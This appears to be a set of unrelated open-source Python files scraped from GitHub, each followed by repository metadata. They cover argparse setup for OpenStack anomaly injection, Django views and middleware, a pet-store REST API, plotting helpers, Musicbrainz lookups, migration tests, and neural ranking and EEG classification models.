cont_net = cont_anomalies.add_parser("network", parents=[network_parser])
cont_stress = cont_anomalies.add_parser("stress", parents=[stress_parser])
# Node Anomaly
node_anomalies = anomaly_node.add_subparsers(dest="anomaly_type")
node_system = node_anomalies.add_parser("system", parents=[system_parser])
node_net = node_anomalies.add_parser("network", parents=[network_parser])
node_stress = node_anomalies.add_parser("stress", parents=[stress_parser], )
# Deployment Anomaly
dep_anomalies = anomaly_deployment.add_subparsers(dest="anomaly_type")
dep_system = dep_anomalies.add_parser("system", parents=[system_parser])
dep_stress = dep_anomalies.add_parser("stress", parents=[stress_parser])
dep_net = dep_anomalies.add_parser("network", parents=[network_parser])
# Network Anomaly
net_anomalies = anomaly_network.add_subparsers(dest="anomaly_type")
net_stress = net_anomalies.add_parser("stress", parents=[stress_parser])
net_system = net_anomalies.add_parser("system", parents=[system_parser])
net_net = net_anomalies.add_parser("network", parents=[network_parser])
if parent:
return parent
else:
return anomaly_inject
def parse_arguments(args):
args = vars(args)
unpacked = unpack_targets(args)
unpacked.update(unpack_params(args))
unpacked['name'] = args.get('anomaly_name', args['anomaly_type'])
log_debug.debug("Unpacked arguments" + str(unpacked))
return unpacked
def unpack_targets(args):
_unpacked = dict()
for arg in args:
if "target" in arg and args[arg]:
param_split = arg.split("_")
if len(param_split) > 1:
_unpacked[param_split[1]] = args[arg]
else:
_unpacked[arg] = args[arg]
return {"target": _unpacked}
def unpack_params(args):
_unpacked = dict()
for arg in args:
if "param" in arg and args[arg]:
param_split = arg.split("_")
if len(param_split) > 1:
_unpacked[param_split[1]] = args[arg]
else:
_unpacked[arg] = args[arg]
return {"params": _unpacked}
| Ydjeen/openstack_anomaly_injection | openstack_anomaly_injection/anomaly_injection/config/argparser/argparser.py | argparser.py | py | 5,377 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "syst... |
5840512827 | from django.http import HttpResponse
from django.http import JsonResponse
from bs4 import BeautifulSoup
import requests
def index(request):
url = "https://air-quality.com/place/india/delhi/a32ed7fc?lang=en&standard=aqi_us"
req = requests.get(url)
soup = BeautifulSoup(req.content, 'html.parser')
val = soup.find("div", {"class": "pollutants"})
c_name = val.findAll("div", {"class": "name"})
v_name = val.findAll("div", {"class": "value"})
result = dict()
for i in range(len(c_name)):
result[c_name[i].get_text()] = v_name[i].get_text()
return JsonResponse({"data" : result}) | amanpreets01/pollutantAPI | mysite/polls/views.py | views.py | py | 622 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.http.JsonResponse",
"line_number": 19,
"usage_type": "call"
}
] |
41787908029 | #from django.shortcuts import render
# Create your views here.
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework import generics
from animals.models import Categories, Status, Tags, Animal, AnimalForm
from api.serializers import AnimalSerializer
from django.http import JsonResponse
# @api_view(['POST'])
# def api_post(request, *args, **kwargs):
# serializer = AnimalSerializer(data=request.data)
# if serializer.is_valid(raise_exception=True):
# instance = serializer.save() #in case of modification
# return Response(serializer.data)
# return Response({"invalid": "Invalid data"}, status=405)
class AnimalDetailAPIView(generics.RetrieveAPIView):
queryset = Animal.objects.all()
serializer_class = AnimalSerializer
api_pet_detailed_view = AnimalDetailAPIView.as_view()
@api_view(['GET', 'DELETE', 'POST'])
def api_pet_by_id(request, pk=None, *args, **kwargs):
method = request.method
print(method)
print(pk)
if pk == None:
return Response(status=405)
animal = Animal.objects.filter(pk=pk)
animal = animal.first()
if method == 'GET': #use pk
if animal is not None:
data = AnimalSerializer(animal, many=False).data
print(data)
return Response(data, status=200)
return Response(status=404)
if method == 'DELETE': #use pk
if animal is not None:
data = AnimalSerializer(animal, many=False).data
animal.delete()
return Respone(data, status=200)
return Response(status=404)
if method == 'POST': # x-www-form-urlencoded
# serializer = AnimalSerializer(data=request.data)
form = AnimalForm(request.POST)
if form.is_valid(raise_exception=True):
instance = form.save() #in case of modification
return Response(form.data)
return Response(status=405)
return
# @api_view(['GET'])
# def api_get(request, *args, **kwargs):
# serializer = AnimalSerializer(data=request.data)
# return Response(status=404)
@api_view(['GET'])
def api_find_by_status(request, *args, **kwargs):
#print("in find by status")
params = request.query_params
#print(params["status"])
params = set(params["status"].split(','))
#print(params)
if params == []:
params = ['available']
to_exclude = set(['available', 'pending', 'sold'])
to_exclude = to_exclude - params
#print(to_exclude)
result = Animal.objects.exclude(status__in=to_exclude)
#print(result)
data = AnimalSerializer(result, many=True).data
#print(data)
return Response(list(data))
@api_view(['POST'])
def api_upload_picture(request, *args, **kwargs):
return Response(status=405)
@api_view(['POST', 'PUT'])
def api_pet(request, *args, **kwargs):
method = request.method
if method == "POST":
serializer = AnimalSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
instance = serializer.save() #in case of modification
return Response(serializer.data)
return Response({"invalid": "Invalid data"}, status=405)
if method == "PUT":
data = request.data
#print("under put method")
pkey = data.get('id')
#print(pkey)
if pkey is not None:
if not Animal.objects.filter(id=pkey):
return Response({"Description" : "Pet not found"}, status=404)
serializer = AnimalSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
instance = serializer.save()
return Response(status=201)
return Response(status=405) | nejcRazpotnik/pet_store_djangoAPI | backend/petStore/api/views.py | views.py | py | 3,732 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.generics.RetrieveAPIView",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.generics",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "animals.models.Animal.objects.all",
"line_number": 24,
"usage_type":... |
25304954617 | """
Author: Diego Pinheiro
github: https://github.com/diegompin
"""
from itertools import cycle
from maracatu.src.plotting.plot_base import PlotBase
# import pandas as pd
# from dataintensive.src import Joint
# from dataintensive.src import BinsDataFrame
# from dataintensive.src import Parameter
# from dataintensive.src import Correlation
class Curves(PlotBase):
'''
'''
def __init__(self):
super().__init__()
def get_par_plot(self):
par_plot = super().get_par_plot()
return par_plot
def plot(self, data, par_plot=None, fig=None, ax=None, **kwargs):
'''
plot() -> fig, ax, par_plot
:param data:
:param par_plot:
:param fig:
:param ax:
:param kwargs:
:return:
'''
fig, ax, par_plot = super().plot(data, par_plot, fig, ax)
if not isinstance(data, list):
data = [data]
par_color = self.get_par(par_plot, 'color', default=PlotBase.colors, transform=cycle)
par_marker = self.get_par(par_plot, 'marker', default=PlotBase.markers, transform=cycle)
par_legend = self.get_par(par_plot, 'legend', transform=cycle)
for df in data:
label = ''
if par_legend:
label = next(par_legend)
par_linewidth = self.get_par(par_plot, 'linewidth', 2)
par_linestyle = self.get_par(par_plot, 'linestyle', '-')
par_alpha = self.get_par(par_plot, 'alpha', .8)
ax.plot(df['X'], df['Y'],
linewidth=par_linewidth,
linestyle=par_linestyle,
alpha=par_alpha,
color=next(par_color),
marker=next(par_marker),
label=label,
**kwargs)
self.configure_ax(ax, par_plot)
self.configure_fig(fig, par_plot)
return fig, ax, par_plot
#
#
# class CurvesDataFrame(Curves):
#
# def __init__(self):
# super().__init__()
#
# def get_par_plot(self):
# par_plot = super().get_par_plot()
# return par_plot
#
# def plot(self, df, par_plot=None, fig=None, ax=None, **kwargs):
# # fig, ax, par_plot = super().plot(pyx, par_plot, fig, ax)
# par_xvar = par_plot['xvar']
# par_yvar = par_plot['yvar']
# par_xbins = par_plot['xbins']
# par_ybins = par_plot['ybins']
#
# df_freq = Joint.get_hist2d(df, xvar=par_xvar, xbins=par_xbins, yvar=par_yvar, ybins=par_ybins)
# df_freq = df_freq['p']
#
# par_slices = self.get_par(par_plot, 'slices', par_ybins)
# par_xbins = par_plot['xbins']
#
# par_plot_base = {
# # 'legend': ['$t$ = %d' % s for s in par_slices],
# # 'legend.loc': 'upper left',
# # 'legend.fontsize': 16,
# # 'fig.figsize': (7,5),
# 'xticklabels.heatmap': False
#
# }
# par_plot.update(par_plot_base)
#
# dfs = []
# for s in par_slices:
# dfs.append(pd.DataFrame({'x': par_xbins, 'y': df_freq.loc[:, s]}))
#
# fig, ax, par_plot = super().plot(dfs, par_plot, fig, ax)
# return fig, ax, par_plot
#
#
# class CurvesResiduals(object):
#
# def __init__(self):
# super().__init__()
# self.plotter = CurvesDataFrame()
#
# def plot(self, df, par_plot=None, fig=None, ax=None, **kwargs):
# par_xvar = par_plot['xvar']
# par_yvar = par_plot['yvar']
#
# xbins, ybins = BinsDataFrame().get(df, par_plot)
# xbins_label, ybins_label = xbins, ybins
#
# df_ori = df
# df = df_ori
#
# par_residuals = Parameter.get_par(par_plot, 'residuals', False)
# if par_residuals:
# df = Correlation.get_df(df, x=par_xvar, y=par_yvar)
#
# xbins_label, ybins_label = BinsDataFrame().get(df_ori, par_plot)
#
# par_base = {
# 'xbins': xbins,
# 'ybins': ybins,
# 'xticklabels': xbins_label,
# # 'xticklabels.formatter': '%.2f',
# # 'xticklabels.maxnlocator': 4,
# 'yticklabels': ybins_label,
# # 'yticklabels.formatter': '%d',
# # 'yticklabels.maxnlocator': 4,
# }
#
# par_base.update(par_plot)
#
# fig, ax, par = self.plotter.plot(df, par_base)
#
# return fig, ax, par_base
| diegompin/maracatu | maracatu/src/plotting/curves.py | curves.py | py | 4,421 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "maracatu.src.plotting.plot_base.PlotBase",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "maracatu.src.plotting.plot_base.PlotBase.colors",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "maracatu.src.plotting.plot_base.PlotBase",
"lin... |
43676904102 | import numpy as np
import cv2
from PIL import Image, ImageFilter
import training_vs2
weights = np.load('weights.npy')
biases = np.load('biases.npy')
def imageprepare(argv):
im = Image.open(argv).convert('L')
width = float(im.size[0])
height = float(im.size[1])
newImage = Image.new('L', (28, 28), (255)) #creates white canvas of 28x28 pixels
if width > height: #check which dimension is bigger
#Width is bigger. Width becomes 20 pixels.
nheight = int(round((20/width*height),0)) #resize height according to ratio width
if (nheight == 0): #rare case but minimum is 1 pixel
nheight = 1
# resize and sharpen
img = im.resize((20,nheight), Image.ANTIALIAS).filter(ImageFilter.SHARPEN)
wtop = int(round(((28 - nheight)/2),0)) #caculate horizontal pozition
newImage.paste(img, (4, wtop)) #paste resized image on white canvas
else:
#Height is bigger. Heigth becomes 20 pixels.
nwidth = int(round((20/height*width),0)) #resize width according to ratio height
if (nwidth == 0): #rare case but minimum is 1 pixel
nwidth = 1
# resize and sharpen
img = im.resize((nwidth,20), Image.ANTIALIAS).filter(ImageFilter.SHARPEN)
wleft = int(round(((28 - nwidth)/2),0)) #caculate vertical pozition
newImage.paste(img, (wleft, 4)) #paste resized image on white canvas
#newImage.save("sample.png")
tv = list(newImage.getdata()) #get pixel values
#normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.
tva = [(255-x)/255 for x in tv]
return tva
#print(tva)
def feedforward(a):
for b, w in zip(biases, weights):
a = sigmoid(np.dot(w, a) + b)
return a
def sigmoid(z):
return 1.0 / (1.0 + np.exp(-z))
def test_project(img):
image = imageprepare(img)
img = np.reshape(image, (784,1))
zzz = np.reshape(img, (28,28))
#cv2.namedWindow('ahihihi', cv2.WINDOW_NORMAL)
#cv2.imshow('ahihihi', zzz)
#cv2.waitKey(1)
m = feedforward(img)
return np.argmax(m)
| tpvt99/detect-gomoku-using-neural-network | test.py | test.py | py | 2,093 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 12,... |
38285183708 | import mock
import pytest
from fc.qemu.exc import MigrationError
from fc.qemu.incoming import (
IncomingAPI,
IncomingServer,
authenticated,
parse_address,
)
def test_authentication_wrapper():
@authenticated
def test(cookie):
return 1
context = mock.Mock()
context.cookie = "asdf"
assert test(context, "asdf") == 1
with pytest.raises(MigrationError):
test(context, "foobar")
def test_parse_address_host():
assert ("host", 1234) == parse_address("host:1234")
def test_parse_address_ipv4():
assert ("10.1.2.3", 4567) == parse_address("10.1.2.3:4567")
def test_parse_address_ipv5():
assert ("2001:db8:1::45", 1234) == parse_address("[2001:db8:1::45]:1234")
def test_incoming_api():
server = mock.Mock()
server.agent.ceph.auth_cookie.return_value = "asdf"
api = IncomingAPI(server)
assert api.cookie == "asdf"
api.ping("asdf")
assert server.extend_cutoff_time.call_args_list == [
mock.call(hard_timeout=60)
]
api.acquire_migration_lock("asdf")
assert server.acquire_migration_lock.call_args_list == [mock.call()]
api.release_migration_lock("asdf")
assert server.release_migration_lock.call_args_list == [mock.call()]
api.acquire_ceph_locks("asdf")
assert server.acquire_ceph_locks.call_args_list == [mock.call()]
api.prepare_incoming("asdf", [], {})
assert server.prepare_incoming.call_args_list == [mock.call([], {})]
api.finish_incoming("asdf")
assert server.finish_incoming.call_args_list == [mock.call()]
api.rescue("asdf")
assert server.rescue.call_args_list == [mock.call()]
api.destroy("asdf")
assert server.destroy.call_args_list == [mock.call()]
api.cancel("asdf")
assert server.cancel.call_args_list == [mock.call()]
def test_incoming_server():
agent = mock.Mock()
agent.migration_ctl_address = "localhost:9000"
server = IncomingServer(agent)
assert server.bind_address == ("localhost", 9000)
server._now = server.timeout._now = mock.Mock(return_value=30)
server.timeout.cutoff = 29
server.extend_cutoff_time(soft_timeout=60)
assert server.timeout.cutoff == 90
server.extend_cutoff_time(soft_timeout=30)
assert server.timeout.cutoff == 90
server.extend_cutoff_time(soft_timeout=40)
assert server.timeout.cutoff == 90
server.extend_cutoff_time(soft_timeout=120)
assert server.timeout.cutoff == 150
server.extend_cutoff_time(hard_timeout=30)
assert server.timeout.cutoff == 60
server.extend_cutoff_time(hard_timeout=340)
assert server.timeout.cutoff == 370
server.extend_cutoff_time(soft_timeout=30)
assert server.timeout.cutoff == 370
| flyingcircusio/fc.qemu | src/fc/qemu/tests/test_migration.py | test_migration.py | py | 2,712 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "fc.qemu.incoming.authenticated",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "mock.Mock",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "fc.qemu.exc.Mi... |
17436736893 | import argparse
import torch
from tqdm import tqdm
import matplotlib.pyplot as plt
import os
from torchvision import transforms
import dataset
from torch.utils.data import DataLoader
from utils.metric import get_overall_valid_score
from utils.generate_CAM import generate_validation_cam
from utils.pyutils import crop_validation_images
from utils.torchutils import PolyOptimizer
import yaml
import importlib
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-batch', default=20, type=int)
parser.add_argument('-epoch', default=20, type=int)
parser.add_argument('-lr', default=0.01, type=float)
parser.add_argument('-test_every', default=5, type=int, help="how often to test a model while training")
parser.add_argument('-d','--device', nargs='+', help='GPU id to use parallel', required=True, type=int)
parser.add_argument('-m', type=str, required=True, help='the save model name')
args = parser.parse_args()
batch_size = args.batch
epochs = args.epoch
base_lr = args.lr
test_every = args.test_every
devices = args.device
model_name = args.m
with open('classification/configuration.yml') as f:
config = yaml.safe_load(f)
mean = config['mean']
std = config['std']
network_image_size = config['network_image_size']
scales = config['scales']
if not os.path.exists('./classification/weights'):
os.mkdir('./classification/weights')
if not os.path.exists('./classification/result'):
os.mkdir('./classification/result')
validation_folder_name = 'classification/glas_valid'
validation_dataset_path = 'classification/glas/2.validation/img'
validation_mask_path = 'classification/glas/2.validation/mask'
if not os.path.exists(validation_folder_name):
os.mkdir(validation_folder_name)
print('crop validation set images ...')
crop_validation_images(validation_dataset_path, network_image_size, network_image_size, scales, validation_folder_name)
print('cropping finishes!')
# load model
resnet38_path = "classification/weights/res38d.pth"
net = getattr(importlib.import_module("network.wide_resnet"), 'wideResNet')()
# net = network.wideResNet()
net.load_state_dict(torch.load(resnet38_path), strict=False)
net = torch.nn.DataParallel(net, device_ids=devices).cuda()
# data augmentation
train_transform = transforms.Compose([
transforms.RandomResizedCrop(size=network_image_size, scale=(0.7, 1)),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.Normalize(mean=mean, std=std)
])
# load training dataset
data_path_name = f'classification/glas/1.training/img'
TrainDataset = dataset.OriginPatchesDataset(data_path_name=data_path_name, transform=train_transform)
print("train Dataset", len(TrainDataset))
TrainDatasampler = torch.utils.data.RandomSampler(TrainDataset)
TrainDataloader = DataLoader(TrainDataset, batch_size=batch_size, num_workers=4, sampler=TrainDatasampler, drop_last=True)
# optimizer and loss
optimizer = PolyOptimizer(net.parameters(), base_lr, weight_decay=1e-4, max_step=epochs, momentum=0.9)
criteria = torch.nn.BCEWithLogitsLoss(reduction='mean')
regression_criteria = torch.nn.MSELoss(reduction='mean').cuda()
criteria.cuda()
# train loop
loss_t = []
iou_v = []
best_val = 0
for i in range(epochs):
count = 0
running_loss = 0.
net.train()
for img, label in tqdm(TrainDataloader):
count += 1
img = img.cuda()
label = label.cuda()
scores = net(img)
loss = criteria(scores, label.float())
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
train_loss = running_loss / count
loss_t.append(train_loss)
valid_iou = 0
if test_every != 0 and ((i + 1) % test_every == 0 or (i + 1) == epochs):
# net_cam = network.wideResNet_cam()
net_cam = getattr(importlib.import_module("network.wide_resnet"), 'wideResNet')()
pretrained = net.state_dict()
pretrained = {k[7:]: v for k, v in pretrained.items()}
pretrained['fc_cam.weight'] = pretrained['fc_cls.weight'].unsqueeze(-1).unsqueeze(-1).to(torch.float64)
pretrained['fc_cam.bias'] = pretrained['fc_cls.bias']
# del pretrained['fc_cls.weight']
# del pretrained['fc_cls.bias']
net_cam.load_state_dict(pretrained)
net_cam = torch.nn.DataParallel(net_cam, device_ids=devices).cuda()
# calculate MIOU
valid_image_path = os.path.join(validation_folder_name, model_name)
generate_validation_cam(net_cam, config, batch_size, validation_dataset_path, validation_folder_name, model_name)
valid_iou = get_overall_valid_score(valid_image_path, validation_mask_path, num_workers=8)
iou_v.append(valid_iou)
if valid_iou > best_val:
print("Updating the best model..........................................")
best_val = valid_iou
torch.save({"model": net.state_dict(), 'optimizer': optimizer.state_dict()}, "./classification/weights/" + model_name + "_best.pth")
print(f'Epoch [{i+1}/{epochs}], Train Loss: {train_loss:.4f}, Valid mIOU: {valid_iou:.4f}, Valid Dice: {2 * valid_iou / (1 + valid_iou):.4f}')
torch.save({"model": net.state_dict(), 'optimizer': optimizer.state_dict()}, "./classification/weights/" + model_name + "_last.pth")
plt.figure(1)
plt.plot(loss_t)
plt.ylabel('loss')
plt.xlabel('epochs')
plt.title('train loss')
plt.savefig('./classification/result/train_loss.png')
plt.close()
plt.figure(2)
plt.plot(list(range(test_every, epochs + 1, test_every)), iou_v)
plt.ylabel('mIoU')
plt.xlabel('epochs')
plt.title('valid mIoU')
plt.savefig('./classification/result/valid_iou.png')
| xmed-lab/OEEM | classification/train.py | train.py | py | 6,342 | python | en | code | 29 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "yaml.safe_load",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path",
"... |
11303967232 | import logging
import musicbrainzngs
from retrying import retry
from ..constants import SAMPLE_RATE
logger = logging.getLogger(__name__)
class MusicbrainzLookup(object):
@retry(stop_max_attempt_number=5, wait_exponential_multiplier=100)
def query(self, disc_id):
logger.debug('Retrieving disc meta online')
musicbrainzngs.set_useragent('cdp-sa', '0.0.1')
musicbrainzngs.auth('', '')
disc_meta = {
'disc_id': disc_id,
'tracks': []
}
try:
response = musicbrainzngs.get_releases_by_discid(
disc_id,
includes=["artists", "artist-credits", "recordings"]
)
except musicbrainzngs.musicbrainz.ResponseError:
logger.exception('Could not retrieve disc meta from Musicbrainz')
return None
if not 'disc' in response.keys() or not 'release-list' in response['disc'].keys():
logger.error('Musicbrainz response contains no relevant information')
return None
this_release = response['disc']['release-list'][0]
if self.is_single_artist(this_release['artist-credit']):
disc_meta['artist'] = this_release['artist-credit-phrase']
disc_meta['title'] = this_release['title']
disc_meta['total_cds'] = len(list(
filter(
lambda medium: medium['format'] == 'CD',
this_release['medium-list']
)
))
for medium in this_release['medium-list']:
for disc in medium['disc-list']:
if disc['id'] == disc_id:
disc_meta['cd'] = int(medium['position'])
tracks = medium['track-list']
for track in tracks:
artist = track['recording']['artist-credit'][0]['artist']['name']
disc_meta['tracks'].append({
'artist': artist,
'title': track['recording']['title'],
'duration': (int(track['length']) // 1000) * SAMPLE_RATE
})
break
if not disc_meta['tracks']:
logger.error('Musicbrainz response has no information about the tracks')
return None
disc_meta['duration'] = sum(track['duration'] for track in disc_meta['tracks'])
return disc_meta
def is_single_artist(self, artist_credit):
return len(artist_credit) == 1 and artist_credit[0]['artist']['type'] in ['Group', 'Person']
| pisarenko-net/cdp-sa | hifi_appliance/meta/musicbrainz.py | musicbrainz.py | py | 2,585 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "musicbrainzngs.set_useragent",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "musicbrainzngs.auth",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "mus... |
70521690663 | import time
from django.core import cache
from django.http import HttpResponse
from django.utils.deprecation import MiddlewareMixin
from xiaochengxu import settings
class CountipMiddle(MiddlewareMixin):
# 在视图执行前调用
def process_request(self,request):
# 获取客户端ip
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0] # 所以这里是真实的ip(若经过负载均衡,和代理有此项)
else:
ip = request.META.get('REMOTE_ADDR') # 这里获得代理ip
black_ips = getattr(settings, 'BLOCKED_IPS')
if ip in black_ips:
return HttpResponse('404')
loadtime = cache.cache.get(ip)
if loadtime:
now = time.time()
cache.cache.set(ip,now)
if now-loadtime < 0.5:
black_ips.append(ip)
setattr(settings, 'BLOCKED_IPS', black_ips)
return HttpResponse('404')
else:
cache.cache.set(ip, 1, 10)
| zhoujialefanjiayuan/liu-lian | xiaochengxu/middleware/fanpa.py | fanpa.py | py | 1,113 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.utils.deprecation.MiddlewareMixin",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "xiaochengxu.settings",
"line_number": 19,
"usage_type": "argument"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 21,
"usage_type": "call"
},... |
28856693359 | import yaml
import json
from typing import Sequence
from types import SimpleNamespace
from itertools import combinations, permutations
from sympy import symbols, Symbol
from sympy.logic.boolalg import BooleanFunction, And, Or, Not
import numpy as np
import torch
from torch import nn, Tensor
from dataset import collate_adjacencies
from models import MultiLayerPerceptron, activations
from utilities import combinations_2, sympy_to_weighted_adjacency, ndarray_to_tuples
class DirectRanker(nn.Module):
def __init__(self, config: SimpleNamespace, in_dim=None):
super().__init__()
if in_dim is None:
in_dim = config.rank_model.input_dim
hidden_dim = config.rank_model.hidden_dim
n_layers = config.rank_model.mlp_layers
p_drop=config.rank_model.p_dropout
xavier_init=config.rank_model.xavier_init
mlp_activation = activations(config, config.rank_model.mlp_activation)
self.enc_ffnn = MultiLayerPerceptron(layer_dims=[in_dim]+[hidden_dim]*n_layers,
layer_activations=[mlp_activation]*n_layers,
p_dropout=p_drop, xavier_init=xavier_init)
self.out_ffnn = MultiLayerPerceptron(layer_dims=[hidden_dim, 1], layer_activations=[nn.Identity()],
p_dropout=p_drop, bias=False, xavier_init=xavier_init)
def forward(self, x: Tensor):
N = x.shape[-2]
assert N == 2
x1 = x[..., 0, :]
x2 = x[..., 1, :]
x1 = self.enc_ffnn(x1)
x2 = self.enc_ffnn(x2)
return self.out_ffnn(x1 - x2), self.out_ffnn(x1), self.out_ffnn(x2)
class MaxSATRanker(nn.Module):
def __init__(self, config: SimpleNamespace, pair_ranker: nn.Module, maxsat_solver: nn.Module) -> None:
super().__init__()
self.config = config
self.pair_ranker = pair_ranker
self.maxsat_solver = maxsat_solver
self.device = torch.device("cuda" if config.training.use_cuda and torch.cuda.is_available() else "cpu")
def forward(self, features):
B, N, D = features.shape
pairwise_indices = combinations_2(np.arange(N), batched=False) # (NC2, 2)
variables = symbols("v1:{}".format(len(pairwise_indices)+1))
pair2idx = {pair : idx for idx, pair in enumerate(ndarray_to_tuples(pairwise_indices))}
pairwise_features = combinations_2(features) # (B, NC2, 2, D)
ranker_predictions = self.pair_ranker(pairwise_features).squeeze() # (B, NC2, 2, D) -> (B, NC2, 1) -> (B, NC2)
formulas = self.create_cnfs(B, N, ranker_predictions, pair2idx, variables)
variable_probabilities = torch.sigmoid(ranker_predictions) # (B, NC2)
adj_matrices = [sympy_to_weighted_adjacency(cnf, weights, device=self.device) for cnf, weights in zip(formulas, variable_probabilities)]
batch_counts = torch.tensor([N] * B, device=self.device)
adj_matrices, batch_counts, formulas, _ = collate_adjacencies(zip(adj_matrices, formulas, [0] * B))
maxsat_assignments = self.maxsat_solver(adj_matrices, batch_counts).squeeze() # (B, NC2 * 2, C) -> (B, NC2, 1) -> (B, NC2)
return ranker_predictions, maxsat_assignments, formulas
def create_cnfs(self, batches: int, n_docs: int, pair_predictions: Tensor, pair2idx: dict, variables: Sequence[Symbol]):
B, N = batches, n_docs
cnfs = []
for sample in range(B):
clauses = []
for i, (x, y, z) in enumerate(combinations(np.arange(N), 3)):
sign_xy = torch.sign(pair_predictions[sample, pair2idx[(x, y)]])
sign_yz = torch.sign(pair_predictions[sample, pair2idx[(y, z)]])
if sign_xy == sign_yz:
clauses.append(Or(
Not(variables[pair2idx[(x, y)]]),
Not(variables[pair2idx[(y, z)]]),
variables[pair2idx[(x,z)]]
))
cnfs.append(And(*clauses))
return cnfs
if __name__ == "__main__":
with open("configurations/config_rank_sat.yaml") as yaml_reader:
config = yaml.safe_load(yaml_reader)
config = json.loads(json.dumps(config), object_hook=lambda d : SimpleNamespace(**d))
print(config)
model = DirectRanker(config)
print(model) | noahleegithub/neurosat-cs4950 | ranking_models.py | ranking_models.py | py | 4,281 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "types.SimpleNamespace",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "models.activation... |
23585423225 | """
EEGNet
edit by hichens
"""
import numpy as np
from sklearn.metrics import roc_auc_score, precision_score, recall_score, accuracy_score
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.optim as optim
import sys; sys.path.append("..")
from utils.options import opt
class SeparableConv2d(nn.Module):
def __init__(self,in_channels,out_channels,kernel_size=1,stride=1,padding=0,dilation=1,bias=False):
super(SeparableConv2d,self).__init__()
self.conv1 = nn.Conv2d(in_channels,in_channels,kernel_size,stride,padding,dilation,groups=in_channels,bias=bias)
self.pointwise = nn.Conv2d(in_channels,out_channels,1,1,0,1,1,bias=bias)
def forward(self,x):
x = self.conv1(x)
x = self.pointwise(x)
return x
class EEGNet(nn.Module):
def __init__(self, opt):
super(EEGNet, self).__init__()
F = [8, 16]
T = 101
D = 2
C = opt.num_channel
# Layer 1
self.conv1 = nn.Conv2d(in_channels=1, out_channels=F[0], kernel_size=(1, 64), padding=(0, 32))
self.batchnorm1 = nn.BatchNorm2d(F[0], False)
self.pooling1 = nn.MaxPool2d(kernel_size=(1, 4))
# Layer 2
self.conv2 = nn.Conv2d(in_channels=F[0], out_channels=D*F[0], kernel_size=(C, 1), groups=F[0])
self.batchnorm2 = nn.BatchNorm2d(D*F[0], False)
self.pooling2 = nn.MaxPool2d(kernel_size=(1, 8))
# Layer 3
self.padding2 = nn.ZeroPad2d((2, 1, 4, 3))
self.conv3 = SeparableConv2d(in_channels=D*F[0], out_channels=F[1], kernel_size=(1, 16), padding=(0, 8))
self.batchnorm3 = nn.BatchNorm2d(F[1], False)
self.pooling3 = nn.MaxPool2d((1, 16))
# I have 120 timepoints.
self.flatten = nn.Flatten()
size = self.get_size()
self.fc = nn.Sequential(
nn.Flatten(),
nn.Linear(size[1], opt.hidden_size),
nn.Dropout(opt.dropout_rate),
nn.ELU(),
nn.Linear(opt.hidden_size, opt.num_class),
nn.ReLU()
)
def get_feature(self, x):
# Layer 1
x = F.elu(self.conv1(x)) # batch_size x 16 x 40 x 101
x = self.batchnorm1(x)
if not opt.small:
x = self.pooling1(x)
x = F.dropout(x, opt.dropout_rate)
# Layer 2
x = self.conv2(x) # batch_size x 16 x 1 x 102
x = F.elu(self.batchnorm2(x))
if not opt.small:
x = self.pooling2(x)
x = F.dropout(x, opt.dropout_rate)
# Layer 3
x = self.conv3(x)
x = F.elu(self.batchnorm3(x))
if not opt.small:
x = self.pooling3(x)
x = F.dropout(x, opt.dropout_rate)
return x
def forward(self, x):
# FC Layer
x = self.get_feature(x)
# print(x.shape)
# sys.exit(0)
x = torch.sigmoid(self.fc(x))
return x
def get_size(self):
x = torch.rand(2, 1, opt.num_channel, opt.num_dim)
x = self.get_feature(x)
x = self.flatten(x)
return x.size()
if __name__ == "__main__":
from utils.options import opt
net = EEGNet(opt)
